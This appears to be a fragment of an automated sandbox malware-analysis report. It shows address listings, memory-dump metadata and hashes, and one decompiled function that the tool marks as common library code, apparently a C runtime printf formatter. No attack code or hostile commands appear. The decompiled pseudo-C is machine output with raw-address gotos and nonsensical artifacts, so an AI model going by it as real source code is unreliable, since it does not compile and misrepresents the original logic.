                                                                                                                            0x25bf8a780a8
                                                                                                                            0x25bf8a780af
                                                                                                                            0x25bf8a780b7
                                                                                                                            0x25bf8a780bb
                                                                                                                            0x25bf8a780c2
                                                                                                                            0x25bf8a780c8
                                                                                                                            0x25bf8a780cf
                                                                                                                            0x25bf8a780d6
                                                                                                                            0x25bf8a780dd
                                                                                                                            0x25bf8a780e4
                                                                                                                            0x25bf8a780e6
                                                                                                                            0x25bf8a780f3
                                                                                                                            0x25bf8a780fa
                                                                                                                            0x25bf8a7810b
                                                                                                                            0x25bf8a78111
                                                                                                                            0x25bf8a7811f
                                                                                                                            0x25bf8a78125
                                                                                                                            0x25bf8a7812d
                                                                                                                            0x25bf8a78132
                                                                                                                            0x25bf8a78137
                                                                                                                            0x25bf8a7813d
                                                                                                                            0x25bf8a78142
                                                                                                                            0x25bf8a78146
                                                                                                                            0x25bf8a7814b
                                                                                                                            0x25bf8a78151
                                                                                                                            0x25bf8a78158
                                                                                                                            0x25bf8a78161
                                                                                                                            0x25bf8a78163
                                                                                                                            0x25bf8a7816a
                                                                                                                            0x25bf8a78174
                                                                                                                            0x25bf8a78178
                                                                                                                            0x25bf8a78181
                                                                                                                            0x25bf8a78186
                                                                                                                            0x25bf8a78190
                                                                                                                            0x25bf8a78197
                                                                                                                            0x25bf8a7819f
                                                                                                                            0x25bf8a781a6
                                                                                                                            0x25bf8a781ad
                                                                                                                            0x25bf8a781b0
                                                                                                                            0x25bf8a781bd
                                                                                                                            0x25bf8a781c1
                                                                                                                            0x25bf8a781c9
                                                                                                                            0x25bf8a781ce
                                                                                                                            0x25bf8a781dc
                                                                                                                            0x25bf8a781e5
                                                                                                                            0x25bf8a781f0
                                                                                                                            0x25bf8a781f9
                                                                                                                            0x25bf8a78223

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: strtok$malloc$_time64$_errno_getptdfree
                                                                                                                            • String ID: ltithread lock error
                                                                                                                            • API String ID: 12760750-589952550
                                                                                                                            • Opcode ID: 365941de4c75aef1f512cb7679ef445106154f63b37aea8ec8384c6663aa20e6
                                                                                                                            • Instruction ID: 4c9ba27664d97ac3d64a47beca83f73a9389d28905bc99a35c92b109dd92d3bc
                                                                                                                            • Opcode Fuzzy Hash: 365941de4c75aef1f512cb7679ef445106154f63b37aea8ec8384c6663aa20e6
                                                                                                                            • Instruction Fuzzy Hash: B9B15973711E40D6EF178B15AC48368BBA4F7447B3F30461ABA2607EA5DB38C461A72C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A7C154 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 260COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 48%
                                                                                                                            			E0000025B25BF8A7C154(void* __ebx, void* __edx, void* __eflags, long long __rbx, long long __rcx, signed int* __rdx, void* __r8, intOrPtr* __r9, long long __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t223;
				void* _t224;
				void* _t227;
				void* _t231;
				void* _t234;
				char _t235;
				signed int _t236;
				void* _t240;
				signed int _t241;
				void* _t245;
				signed int _t246;
				signed int _t251;
				signed int _t257;
				void* _t263;
				signed int _t281;
				signed int _t296;
				signed int _t298;
				void* _t310;
				signed int _t316;
				signed int _t319;
				signed int _t337;
				void* _t338;
				intOrPtr _t348;
				signed int _t375;
				signed int _t381;
				void* _t389;
				char* _t393;
				signed int _t399;
				void* _t423;
				signed long long _t437;
				signed long long _t438;
				intOrPtr _t444;
				char* _t448;
				long long* _t449;
				signed long long _t453;
				intOrPtr _t459;
				void* _t462;
				char* _t464;
				char* _t466;
				char* _t468;
				signed short* _t469;
				signed long long _t476;
				void* _t477;
				intOrPtr* _t478;
				void* _t510;
				void* _t518;
				signed int* _t521;
				signed int* _t522;
				signed int* _t523;
				signed int* _t524;
				void* _t528;
				void* _t531;
				void* _t532;
				void* _t534;
				signed long long _t535;
				signed long long _t545;
				signed long long _t559;
				signed long long _t571;
				void* _t573;
				intOrPtr* _t575;
				intOrPtr* _t577;
				long long _t580;
				intOrPtr* _t581;
				signed int* _t582;
				void* _t586;
				void* _t588;

				 *((long long*)(_t534 + 0x18)) = __rbx;
				_t532 = _t534 - 0x1e0;
				_t535 = _t534 - 0x2e0;
				_t437 =  *0xf8a9c990; // 0x18002eb3c
				_t438 = _t437 ^ _t535;
				 *(_t532 + 0x1d8) = _t438;
				 *((long long*)(_t535 + 0x68)) = __rcx;
				 *((intOrPtr*)(_t535 + 0x60)) = 0;
				r14d = 0;
				 *(_t535 + 0x54) = 0;
				r12d = 0;
				 *(_t535 + 0x48) = 0;
				 *(_t535 + 0x5c) = 0;
				 *(_t535 + 0x50) = 0;
				E0000025B25BF8A7C0AC(_t438, _t532 - 0x58, __r8);
				E0000025B25BF8A7B89C(_t438);
				r8d = r8d | 0xffffffff;
				r10d = 0;
				 *(_t532 - 0x70) = _t438;
				if (__rcx == 0) goto 0xf8a7cb1f;
				if (( *(__rcx + 0x18) & 0x00000040) != 0) goto 0xf8a7c273;
				_t559 = E0000025B25BF8A7F864(__edx, _t438, __rcx);
				if (_t559 + 2 - 1 <= 0) goto 0xf8a7c222;
				r8d = r8d & 0x0000001f;
				goto 0xf8a7c225;
				if (( *0x25BF8A9D2B8 & 0x0000007f) != 0) goto 0xf8a7cb1f;
				if (_t559 + 2 - 1 <= 0) goto 0xf8a7c25b;
				goto 0xf8a7c262;
				if (( *(_t559 * 0x58 +  *((intOrPtr*)(0x25bf8a5f400 + 0x43e00 + (_t559 >> 5) * 8)) + 0x38) & 0x00000080) != 0) goto 0xf8a7cb1f;
				r8d = r8d | 0xffffffff;
				r10d = 0;
				if (__rdx == 0) goto 0xf8a7cb1f;
				r15b =  *__rdx;
				 *(_t535 + 0x40) = r10d;
				 *(_t535 + 0x44) = r10d;
				_t296 = r10d;
				 *((long long*)(_t532 - 0x80)) = __r10;
				if (r15b == 0) goto 0xf8a7cb37;
				r11d = 0x200;
				 *(_t532 - 0x68) =  &(__rdx[0]);
				if (r10d < 0) goto 0xf8a7cb37;
				_t38 = _t588 - 0x20; // -32
				if (_t38 - 0x58 > 0) goto 0xf8a7c2cf;
				asm("por mm0, [ebx]");
				_t476 = r10d;
				_t298 =  *(_t296 + _t476 * 8 + 0x25bf8a8d920) >> 4;
				 *(_t535 + 0x58) = _t298;
				_t337 = _t298;
				if (_t337 == 0) goto 0xf8a7c9e1;
				if (_t337 == 0) goto 0xf8a7cafb;
				if (_t337 == 0) goto 0xf8a7caab;
				if (_t337 == 0) goto 0xf8a7ca6f;
				if (_t337 == 0) goto 0xf8a7ca67;
				if (_t337 == 0) goto 0xf8a7ca32;
				if (_t337 == 0) goto 0xf8a7c957;
				if (_t337 != 0) goto 0xf8a7c942;
				_t281 = r15b;
				_t338 = _t281 - 0x64;
				if (_t338 > 0) goto 0xf8a7c4a4;
				if (_t338 == 0) goto 0xf8a7c5a5;
				if (_t281 == 0x41) goto 0xf8a7c479;
				if (_t281 == 0x43) goto 0xf8a7c41f;
				if ((_t476 - 0x00000045 & 0xfffffffd) == 0) goto 0xf8a7c479;
				if (_t281 == 0x53) goto 0xf8a7c3d3;
				if (_t281 == 0x58) goto 0xf8a7c53e;
				if (_t281 == 0x5a) goto 0xf8a7c38b;
				if (_t281 == 0x61) goto 0xf8a7c485;
				if (_t281 == 0x63) goto 0xf8a7c42d;
				goto 0xf8a7c7b0;
				_t444 =  *__r9;
				_t575 = __r9 + 8;
				if (_t444 == 0) goto 0xf8a7c3c7;
				_t348 =  *((intOrPtr*)(_t444 + 8));
				if (_t348 == 0) goto 0xf8a7c3c7;
				asm("inc ecx");
				if (_t348 >= 0) goto 0xf8a7c3bd;
				asm("cdq");
				 *(_t535 + 0x50) = 1;
				goto 0xf8a7c7ac;
				 *(_t535 + 0x50) = r10d;
				goto 0xf8a7c7ac;
				goto 0xf8a7c7a1;
				if ((r14d & 0x00000830) != 0) goto 0xf8a7c3e1;
				asm("inc ecx");
				_t459 =  *_t575;
				_t223 =  ==  ? 0x7fffffff : r12d;
				if ((r14d & 0x00000810) == 0) goto 0xf8a7c50a;
				 *(_t535 + 0x50) = 1;
				_t460 =  ==  ?  *0xf8a9c5c0 : _t459;
				_t477 =  ==  ?  *0xf8a9c5c0 : _t459;
				goto 0xf8a7c4fe;
				if ((r14d & 0x00000830) != 0) goto 0xf8a7c42d;
				asm("inc ecx");
				_t577 = _t575 + 0x10;
				if ((r14d & 0x00000810) == 0) goto 0xf8a7c461;
				r9d =  *(_t577 - 8) & 0x0000ffff;
				_t510 = _t532 - 0x30;
				_t478 = _t535 + 0x44;
				_t224 = E0000025B25BF8A833AC();
				r10d = 0;
				if (_t224 == 0) goto 0xf8a7c470;
				 *(_t535 + 0x5c) = 1;
				goto 0xf8a7c470;
				 *(_t535 + 0x44) = 1;
				 *((char*)(_t532 - 0x30)) =  *(_t577 - 8);
				goto 0xf8a7c7b0;
				 *(_t535 + 0x78) = 1;
				r15b = r15b + 0x20;
				r14d = r14d | 0x00000040;
				_t462 = _t532 - 0x30;
				_t319 = r11d;
				if (r12d >= 0) goto 0xf8a7c6c3;
				r12d = 6;
				goto 0xf8a7c709;
				if (0x7fffffff - 0x65 < 0) goto 0xf8a7c7b0;
				if (0x7fffffff - 0x67 <= 0) goto 0xf8a7c485;
				if (0x7fffffff == 0x69) goto 0xf8a7c5a5;
				if (0x7fffffff == 0x6e) goto 0xf8a7c573;
				if (0x7fffffff == 0x6f) goto 0xf8a7c563;
				if (0x7fffffff == 0x70) goto 0xf8a7c533;
				if (0x7fffffff == 0x73) goto 0xf8a7c3e1;
				if (0x7fffffff == 0x75) goto 0xf8a7c5a9;
				if (0x7fffffff != 0x78) goto 0xf8a7c7b0;
				goto 0xf8a7c543;
				_t227 = _t478 - 0x50;
				if ( *_t478 == r10w) goto 0xf8a7c502;
				if (_t227 != 0) goto 0xf8a7c4f2;
				goto 0xf8a7c52a;
				_t463 =  ==  ?  *0xf8a9c5b8 : _t462;
				_t482 =  ==  ?  *0xf8a9c5b8 : _t462;
				goto 0xf8a7c524;
				if ( *((intOrPtr*)( ==  ?  *0xf8a9c5b8 : _t462)) == r10b) goto 0xf8a7c528;
				if (_t227 - 1 != 0) goto 0xf8a7c51a;
				 *(_t535 + 0x44) = 0x7fffffff;
				goto 0xf8a7c7b0;
				r12d = 0x10;
				asm("inc ecx");
				 *((intOrPtr*)(_t535 + 0x60)) = 7;
				r9d = 0x10;
				if (r14b >= 0) goto 0xf8a7c5af;
				 *((char*)(_t535 + 0x4c)) = 0x30;
				 *((char*)(_t535 + 0x4d)) = 0x58;
				goto 0xf8a7c5b3;
				r9d = 8;
				if (r14b >= 0) goto 0xf8a7c5af;
				r14d = r14d | r11d;
				goto 0xf8a7c5af;
				_t521 =  *_t577;
				_t231 = E0000025B25BF8A79CA0();
				r10d = 0;
				if (_t231 == 0) goto 0xf8a7cb1f;
				if ((r14b & 0x00000020) == 0) goto 0xf8a7c596;
				 *_t521 = _t319;
				goto 0xf8a7c598;
				 *_t521 = _t319;
				 *(_t535 + 0x5c) = 1;
				goto 0xf8a7c911;
				r14d = r14d | 0x00000040;
				r9d = 0xa;
				_t375 = 0x00008000 & r14d;
				if (_t375 == 0) goto 0xf8a7c5c7;
				goto 0xf8a7c601;
				asm("inc ecx");
				if (_t375 < 0) goto 0xf8a7c5bd;
				_t580 = _t577 + 0x18;
				if ((r14b & 0x00000020) == 0) goto 0xf8a7c5f1;
				 *((long long*)(_t535 + 0x70)) = _t580;
				if ((r14b & 0x00000040) == 0) goto 0xf8a7c5ea;
				goto 0xf8a7c606;
				r8d =  *(_t580 - 8) & 0x0000ffff;
				goto 0xf8a7c606;
				if ((r14b & 0x00000040) == 0) goto 0xf8a7c5fd;
				_t545 =  *(_t580 - 8);
				goto 0xf8a7c601;
				r8d =  *(_t580 - 8);
				 *((long long*)(_t535 + 0x70)) = _t580;
				if ((r14b & 0x00000040) == 0) goto 0xf8a7c619;
				if (_t545 >= 0) goto 0xf8a7c619;
				asm("inc ecx");
				_t381 = 0x00008000 & r14d;
				if (_t381 != 0) goto 0xf8a7c628;
				asm("inc ecx");
				if (_t381 < 0) goto 0xf8a7c628;
				if (r12d >= 0) goto 0xf8a7c635;
				r12d = 1;
				goto 0xf8a7c640;
				r14d = r14d & 0xfffffff7;
				r12d =  >  ? r11d : r12d;
				r13d =  *((intOrPtr*)(_t535 + 0x60));
				_t464 = _t532 + 0x1cf;
				asm("sbb ecx, ecx");
				 *(_t535 + 0x48) = 0x7fffffff - __ebx &  *(_t535 + 0x48);
				r12d = r12d - 1;
				if (r12d > 0) goto 0xf8a7c669;
				if ( ~_t545 == 0) goto 0xf8a7c689;
				_t106 = _t510 + 0x30; // 0x30
				_t234 = _t106;
				if (_t234 - 0x39 <= 0) goto 0xf8a7c682;
				_t235 = _t234 + r13d;
				 *_t464 = _t235;
				goto 0xf8a7c65a;
				_t581 =  *((intOrPtr*)(_t535 + 0x70));
				_t448 = _t532 + 0x1cf;
				_t236 = _t235 - __ebx;
				_t466 = _t464 - 1 + 1;
				 *(_t535 + 0x44) = _t236;
				if ((r11d & r14d) == 0) goto 0xf8a7c7b0;
				if (_t236 == 0) goto 0xf8a7c6b4;
				_t389 =  *_t466 - 0x30;
				if (_t389 == 0) goto 0xf8a7c7b0;
				 *(_t535 + 0x44) =  *(_t535 + 0x44) + 1;
				 *((char*)(_t466 - 1)) = 0x30;
				goto 0xf8a7c7b0;
				if (_t389 != 0) goto 0xf8a7c6d3;
				if (r15b != 0x67) goto 0xf8a7c709;
				r12d = 1;
				goto 0xf8a7c709;
				r12d =  >  ? r11d : r12d;
				if (r12d - 0xa3 <= 0) goto 0xf8a7c709;
				_t310 = _t571 + 0x15d;
				E0000025B25BF8A7E798(_t466 - 1, _t310, _t521, _t528, _t532);
				 *((long long*)(_t532 - 0x80)) = _t448;
				_t393 = _t448;
				if (_t393 == 0) goto 0xf8a7c703;
				_t468 = _t448;
				goto 0xf8a7c709;
				r12d = 0xa3;
				_t449 =  *_t581;
				_t582 = _t581 + 8;
				_t529 = _t310;
				 *((long long*)(_t532 - 0x60)) = _t449;
				"%d\t%d\t%s\n"();
				r9d = r15b;
				 *((long long*)(_t535 + 0x30)) = _t532 - 0x58;
				 *(_t535 + 0x28) =  *(_t535 + 0x78);
				 *(_t535 + 0x20) = r12d;
				 *_t449(_t588, _t586, _t573, _t571, _t518, _t528, _t531);
				if (_t393 == 0) goto 0xf8a7c774;
				if (r12d != 0) goto 0xf8a7c774;
				"%d\t%d\t%s\n"();
				 *_t449();
				if (r15b != 0x67) goto 0xf8a7c794;
				if ((r14d & 0x00000080) != 0) goto 0xf8a7c794;
				"%d\t%d\t%s\n"();
				_t240 =  *_t449();
				if ( *_t468 != 0x2d) goto 0xf8a7c7a1;
				asm("inc ecx");
				_t469 = _t468 + 1;
				_t241 = E0000025B25BF8A82800(_t240, _t469);
				r10d = 0;
				 *(_t535 + 0x44) = _t241;
				if ( *(_t535 + 0x5c) != r10d) goto 0xf8a7c911;
				_t399 = r14b & 0x00000040;
				if (_t399 == 0) goto 0xf8a7c7f2;
				asm("inc ecx");
				if (_t399 >= 0) goto 0xf8a7c7cf;
				 *((char*)(_t535 + 0x4c)) = 0x2d;
				goto 0xf8a7c7da;
				if ((r14b & 0x00000001) == 0) goto 0xf8a7c7e5;
				 *((char*)(_t535 + 0x4c)) = 0x2b;
				 *(_t535 + 0x48) = 1;
				goto 0xf8a7c7f6;
				if ((r14b & 0x00000002) == 0) goto 0xf8a7c7f2;
				 *((char*)(_t535 + 0x4c)) = 0x20;
				goto 0xf8a7c7da;
				if ((r14b & 0x0000000c) != 0) goto 0xf8a7c81c;
				E0000025B25BF8A7CBBC(0x20,  *(_t535 + 0x54) -  *(_t535 + 0x44) -  *(_t535 + 0x48), _t469, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
				 *(_t535 + 0x20) =  *(_t532 - 0x70);
				E0000025B25BF8A7D648( *(_t535 + 0x48), _t469, _t535 + 0x4c, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
				if ((r14b & 0x00000008) == 0) goto 0xf8a7c856;
				if ((r14b & 0x00000004) != 0) goto 0xf8a7c856;
				E0000025B25BF8A7CBBC(0x30,  *(_t535 + 0x54) -  *(_t535 + 0x44) -  *(_t535 + 0x48), _t469, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
				_t316 =  *(_t535 + 0x44);
				if ( *(_t535 + 0x50) == 0) goto 0xf8a7c8d1;
				if (_t316 <= 0) goto 0xf8a7c8d1;
				r9d =  *_t469 & 0x0000ffff;
				r8d = 6;
				_t245 = E0000025B25BF8A833AC();
				r10d = 0;
				if (_t245 != 0) goto 0xf8a7c8c3;
				if ( *((intOrPtr*)(_t532 - 0x78)) == 0) goto 0xf8a7c8c3;
				 *(_t535 + 0x20) =  *(_t532 - 0x70);
				_t246 = E0000025B25BF8A7D648( *((intOrPtr*)(_t532 - 0x78)), _t469, _t532 + 0x1d0, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
				r10d = 0;
				if (_t316 - 1 != 0) goto 0xf8a7c868;
				goto 0xf8a7c8ef;
				 *(_t535 + 0x40) = _t246 | 0xffffffff;
				goto 0xf8a7c8f3;
				 *(_t535 + 0x20) =  *(_t532 - 0x70);
				E0000025B25BF8A7D648(_t316 - 1, _t469, _t469, _t310, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
				r10d = 0;
				if ( *(_t535 + 0x40) < 0) goto 0xf8a7c911;
				if ((r14b & 0x00000004) == 0) goto 0xf8a7c911;
				E0000025B25BF8A7CBBC(0x20,  *(_t535 + 0x54) -  *(_t535 + 0x44) -  *(_t535 + 0x48), _t469, _t529, _t532,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
				r10d = 0;
				_t453 =  *((intOrPtr*)(_t532 - 0x80));
				if (_t453 == 0) goto 0xf8a7c929;
				free(??);
				r10d = 0;
				 *((long long*)(_t532 - 0x80)) = __r10;
				_t522 =  *(_t532 - 0x68);
				r11d = 0x200;
				r15b =  *_t522;
				if (r15b == 0) goto 0xf8a7cb37;
				r8d = r8d | 0xffffffff;
				goto 0xf8a7c2a6;
				if (r15b == 0x49) goto 0xf8a7c991;
				if (r15b == 0x68) goto 0xf8a7c98b;
				if (r15b == 0x6c) goto 0xf8a7c976;
				if (r15b != 0x77) goto 0xf8a7c942;
				asm("inc ecx");
				goto 0xf8a7c942;
				if ( *_t522 != 0x6c) goto 0xf8a7c985;
				_t523 =  &(_t522[0]);
				asm("inc ecx");
				goto 0xf8a7c942;
				r14d = r14d | 0x00000010;
				goto 0xf8a7c942;
				r14d = r14d | 0x00000020;
				goto 0xf8a7c942;
				_t251 =  *_t523;
				asm("inc ecx");
				if (_t251 != 0x36) goto 0xf8a7c9ad;
				if (_t523[0] != 0x34) goto 0xf8a7c9ad;
				_t524 =  &(_t523[0]);
				asm("inc ecx");
				goto 0xf8a7c942;
				if (_t251 != 0x33) goto 0xf8a7c9c2;
				if (_t524[0] != 0x32) goto 0xf8a7c9c2;
				asm("inc ecx");
				goto 0xf8a7c942;
				_t423 = _t251 - 0x58 - 0x20;
				if (_t423 > 0) goto 0xf8a7c9dc;
				asm("dec eax");
				if (_t423 < 0) goto 0xf8a7c942;
				 *(_t535 + 0x58) = r10d;
				 *(_t535 + 0x50) = r10d;
				if (E0000025B25BF8A83194(r15b & 0xffffffff, _t423, _t453, _t532 - 0x58) == 0) goto 0xf8a7ca18;
				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
				r15b = _t524[0];
				if (r15b == 0) goto 0xf8a7cb1f;
				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t535 + 0x68)), _t535 + 0x40);
				r10d = 0;
				goto 0xf8a7c92d;
				if (r15b != 0x2a) goto 0xf8a7ca51;
				r12d =  *_t582;
				if (r12d >= 0) goto 0xf8a7c942;
				r12d = r8d;
				goto 0xf8a7c942;
				r12d = _t571 + _t571 * 4;
				r12d = _t571 - 0x18;
				r12d = _t453 + _t571 * 2;
				goto 0xf8a7c942;
				r12d = r10d;
				goto 0xf8a7c942;
				if (r15b != 0x2a) goto 0xf8a7ca91;
				_t257 = _t582[2];
				 *(_t535 + 0x54) = _t257;
				if (_t257 >= 0) goto 0xf8a7c942;
				r14d = r14d | 0x00000004;
				goto 0xf8a7caa2;
				 *(_t535 + 0x54) = _t453 + 0x341041fd2;
				goto 0xf8a7c942;
				if (r15b == 0x20) goto 0xf8a7caf2;
				if (r15b == 0x23) goto 0xf8a7cae8;
				if (r15b == 0x2b) goto 0xf8a7cadf;
				if (r15b == 0x2d) goto 0xf8a7cad6;
				if (r15b != 0x30) goto 0xf8a7c942;
				r14d = r14d | 0x00000008;
				goto 0xf8a7c942;
				r14d = r14d | 0x00000004;
				goto 0xf8a7c942;
				r14d = r14d | 0x00000001;
				goto 0xf8a7c942;
				asm("inc ecx");
				goto 0xf8a7c942;
				r14d = r14d | 0x00000002;
				goto 0xf8a7c942;
				 *(_t535 + 0x78) = r10d;
				 *(_t535 + 0x5c) = r10d;
				 *(_t535 + 0x54) = r10d;
				 *(_t535 + 0x48) = r10d;
				r14d = r10d;
				r12d = r8d;
				 *(_t535 + 0x50) = r10d;
				goto 0xf8a7c942;
				_t263 = E0000025B25BF8A7B89C(_t453);
				 *_t453 = 0x16;
				E0000025B25BF8A7BEC4(_t263);
				r10d = 0;
				goto 0xf8a7cb39;
				if ( *((intOrPtr*)(_t532 - 0x40)) == r10b) goto 0xf8a7cb4a;
				 *( *((intOrPtr*)(_t532 - 0x48)) + 0xc8) =  *( *((intOrPtr*)(_t532 - 0x48)) + 0xc8) & 0xfffffffd;
				return E0000025B25BF8A81A50(_t453 + _t453 * 4, _t469,  *(_t532 + 0x1d8) ^ _t535,  *((intOrPtr*)(_t535 + 0x68)),  &(_t524[0]), _t529, _t532, _t571);
			}









































































                                                                                                                            0x25bf8a7c154
                                                                                                                            0x25bf8a7c164
                                                                                                                            0x25bf8a7c16c
                                                                                                                            0x25bf8a7c173
                                                                                                                            0x25bf8a7c17a
                                                                                                                            0x25bf8a7c17d
                                                                                                                            0x25bf8a7c189
                                                                                                                            0x25bf8a7c19b
                                                                                                                            0x25bf8a7c19f
                                                                                                                            0x25bf8a7c1a2
                                                                                                                            0x25bf8a7c1a6
                                                                                                                            0x25bf8a7c1a9
                                                                                                                            0x25bf8a7c1ad
                                                                                                                            0x25bf8a7c1b1
                                                                                                                            0x25bf8a7c1b5
                                                                                                                            0x25bf8a7c1ba
                                                                                                                            0x25bf8a7c1bf
                                                                                                                            0x25bf8a7c1c3
                                                                                                                            0x25bf8a7c1c6
                                                                                                                            0x25bf8a7c1cd
                                                                                                                            0x25bf8a7c1de
                                                                                                                            0x25bf8a7c1f3
                                                                                                                            0x25bf8a7c1fd
                                                                                                                            0x25bf8a7c20c
                                                                                                                            0x25bf8a7c220
                                                                                                                            0x25bf8a7c22a
                                                                                                                            0x25bf8a7c237
                                                                                                                            0x25bf8a7c259
                                                                                                                            0x25bf8a7c266
                                                                                                                            0x25bf8a7c26c
                                                                                                                            0x25bf8a7c270
                                                                                                                            0x25bf8a7c276
                                                                                                                            0x25bf8a7c27c
                                                                                                                            0x25bf8a7c282
                                                                                                                            0x25bf8a7c287
                                                                                                                            0x25bf8a7c28c
                                                                                                                            0x25bf8a7c28f
                                                                                                                            0x25bf8a7c296
                                                                                                                            0x25bf8a7c2a0
                                                                                                                            0x25bf8a7c2a9
                                                                                                                            0x25bf8a7c2af
                                                                                                                            0x25bf8a7c2b5
                                                                                                                            0x25bf8a7c2bb
                                                                                                                            0x25bf8a7c2cc
                                                                                                                            0x25bf8a7c2d5
                                                                                                                            0x25bf8a7c2e5
                                                                                                                            0x25bf8a7c2e8
                                                                                                                            0x25bf8a7c2ee
                                                                                                                            0x25bf8a7c2f0
                                                                                                                            0x25bf8a7c2f8
                                                                                                                            0x25bf8a7c300
                                                                                                                            0x25bf8a7c308
                                                                                                                            0x25bf8a7c310
                                                                                                                            0x25bf8a7c318
                                                                                                                            0x25bf8a7c320
                                                                                                                            0x25bf8a7c328
                                                                                                                            0x25bf8a7c32e
                                                                                                                            0x25bf8a7c332
                                                                                                                            0x25bf8a7c335
                                                                                                                            0x25bf8a7c33b
                                                                                                                            0x25bf8a7c344
                                                                                                                            0x25bf8a7c34d
                                                                                                                            0x25bf8a7c35b
                                                                                                                            0x25bf8a7c364
                                                                                                                            0x25bf8a7c369
                                                                                                                            0x25bf8a7c372
                                                                                                                            0x25bf8a7c377
                                                                                                                            0x25bf8a7c380
                                                                                                                            0x25bf8a7c386
                                                                                                                            0x25bf8a7c38b
                                                                                                                            0x25bf8a7c38f
                                                                                                                            0x25bf8a7c396
                                                                                                                            0x25bf8a7c39c
                                                                                                                            0x25bf8a7c39f
                                                                                                                            0x25bf8a7c3a4
                                                                                                                            0x25bf8a7c3a9
                                                                                                                            0x25bf8a7c3ab
                                                                                                                            0x25bf8a7c3ac
                                                                                                                            0x25bf8a7c3b8
                                                                                                                            0x25bf8a7c3bd
                                                                                                                            0x25bf8a7c3c2
                                                                                                                            0x25bf8a7c3ce
                                                                                                                            0x25bf8a7c3da
                                                                                                                            0x25bf8a7c3dc
                                                                                                                            0x25bf8a7c3e1
                                                                                                                            0x25bf8a7c3f0
                                                                                                                            0x25bf8a7c3fe
                                                                                                                            0x25bf8a7c407
                                                                                                                            0x25bf8a7c40f
                                                                                                                            0x25bf8a7c417
                                                                                                                            0x25bf8a7c41a
                                                                                                                            0x25bf8a7c426
                                                                                                                            0x25bf8a7c428
                                                                                                                            0x25bf8a7c42d
                                                                                                                            0x25bf8a7c438
                                                                                                                            0x25bf8a7c43a
                                                                                                                            0x25bf8a7c43f
                                                                                                                            0x25bf8a7c443
                                                                                                                            0x25bf8a7c44b
                                                                                                                            0x25bf8a7c450
                                                                                                                            0x25bf8a7c455
                                                                                                                            0x25bf8a7c457
                                                                                                                            0x25bf8a7c45f
                                                                                                                            0x25bf8a7c465
                                                                                                                            0x25bf8a7c46d
                                                                                                                            0x25bf8a7c474
                                                                                                                            0x25bf8a7c479
                                                                                                                            0x25bf8a7c481
                                                                                                                            0x25bf8a7c485
                                                                                                                            0x25bf8a7c489
                                                                                                                            0x25bf8a7c48d
                                                                                                                            0x25bf8a7c493
                                                                                                                            0x25bf8a7c499
                                                                                                                            0x25bf8a7c49f
                                                                                                                            0x25bf8a7c4a7
                                                                                                                            0x25bf8a7c4b0
                                                                                                                            0x25bf8a7c4b5
                                                                                                                            0x25bf8a7c4be
                                                                                                                            0x25bf8a7c4c7
                                                                                                                            0x25bf8a7c4d0
                                                                                                                            0x25bf8a7c4d5
                                                                                                                            0x25bf8a7c4de
                                                                                                                            0x25bf8a7c4e7
                                                                                                                            0x25bf8a7c4f0
                                                                                                                            0x25bf8a7c4f2
                                                                                                                            0x25bf8a7c4f8
                                                                                                                            0x25bf8a7c500
                                                                                                                            0x25bf8a7c508
                                                                                                                            0x25bf8a7c50d
                                                                                                                            0x25bf8a7c515
                                                                                                                            0x25bf8a7c518
                                                                                                                            0x25bf8a7c51f
                                                                                                                            0x25bf8a7c526
                                                                                                                            0x25bf8a7c52a
                                                                                                                            0x25bf8a7c52e
                                                                                                                            0x25bf8a7c533
                                                                                                                            0x25bf8a7c539
                                                                                                                            0x25bf8a7c543
                                                                                                                            0x25bf8a7c547
                                                                                                                            0x25bf8a7c550
                                                                                                                            0x25bf8a7c554
                                                                                                                            0x25bf8a7c55d
                                                                                                                            0x25bf8a7c561
                                                                                                                            0x25bf8a7c563
                                                                                                                            0x25bf8a7c56c
                                                                                                                            0x25bf8a7c56e
                                                                                                                            0x25bf8a7c571
                                                                                                                            0x25bf8a7c573
                                                                                                                            0x25bf8a7c57b
                                                                                                                            0x25bf8a7c580
                                                                                                                            0x25bf8a7c585
                                                                                                                            0x25bf8a7c58f
                                                                                                                            0x25bf8a7c591
                                                                                                                            0x25bf8a7c594
                                                                                                                            0x25bf8a7c596
                                                                                                                            0x25bf8a7c598
                                                                                                                            0x25bf8a7c5a0
                                                                                                                            0x25bf8a7c5a5
                                                                                                                            0x25bf8a7c5a9
                                                                                                                            0x25bf8a7c5b8
                                                                                                                            0x25bf8a7c5bb
                                                                                                                            0x25bf8a7c5c5
                                                                                                                            0x25bf8a7c5c7
                                                                                                                            0x25bf8a7c5cc
                                                                                                                            0x25bf8a7c5ce
                                                                                                                            0x25bf8a7c5d6
                                                                                                                            0x25bf8a7c5d8
                                                                                                                            0x25bf8a7c5e1
                                                                                                                            0x25bf8a7c5e8
                                                                                                                            0x25bf8a7c5ea
                                                                                                                            0x25bf8a7c5ef
                                                                                                                            0x25bf8a7c5f5
                                                                                                                            0x25bf8a7c5f7
                                                                                                                            0x25bf8a7c5fb
                                                                                                                            0x25bf8a7c5fd
                                                                                                                            0x25bf8a7c601
                                                                                                                            0x25bf8a7c60a
                                                                                                                            0x25bf8a7c60f
                                                                                                                            0x25bf8a7c614
                                                                                                                            0x25bf8a7c619
                                                                                                                            0x25bf8a7c61c
